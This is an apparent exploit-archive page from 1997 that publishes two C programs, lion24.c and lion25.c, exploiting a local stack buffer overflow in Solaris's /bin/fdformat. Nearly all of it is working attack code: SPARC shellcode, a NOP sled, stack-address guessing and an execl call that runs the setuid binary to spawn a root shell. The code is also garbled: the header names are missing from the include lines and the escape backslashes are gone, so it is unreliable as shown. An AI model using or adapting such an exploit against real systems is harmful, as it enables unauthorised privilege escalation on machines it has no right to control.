[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits
# Published : 1997-03-23
# Author : Cristian Schipor
# Previous Title : Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities
# Next Title : Xt Library Local Root Command Execution Exploit


--------------------------- lion24.c ---------------------------------
/*
Solaris 2.4
*/

  #include 
   #include 
   #include 
   #include 
   
   #define BUF_LENGTH 264
   #define EXTRA 36
   #define STACK_OFFSET -56
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "x2dx0bxd8x9axacx15xa1x6ex2fx0bxdaxdcxaex15xe3x68"
   "x90x0bx80x0ex92x03xa0x0cx94x1ax80x0ax9cx03xa0x14"
   "xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
   "x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
   "x91xd0x20x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 n");
   }
   
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
   perror("execl failed");
   }
------------------------------ end of lion24.c --------------------------

-------------------------------- lion25.c ------------------------------
/* 
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
2.5.1
*/

   #include 
   #include 
   #include 
   #include 
   
   #define BUF_LENGTH 364
   #define EXTRA 400
   #define STACK_OFFSET 704
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "x2dx0bxd8x9axacx15xa1x6ex2fx0bxdaxdcxaex15xe3x68"
   "x90x0bx80x0ex92x03xa0x0cx94x1ax80x0ax9cx03xa0x14"
   "xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
   "x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
   "x91xd0x20x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 n");
   }
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
   perror("execl failed");
   }

--------------------------- end of lion25.c -------------------------------


// www.Syue.com [1997-03-23]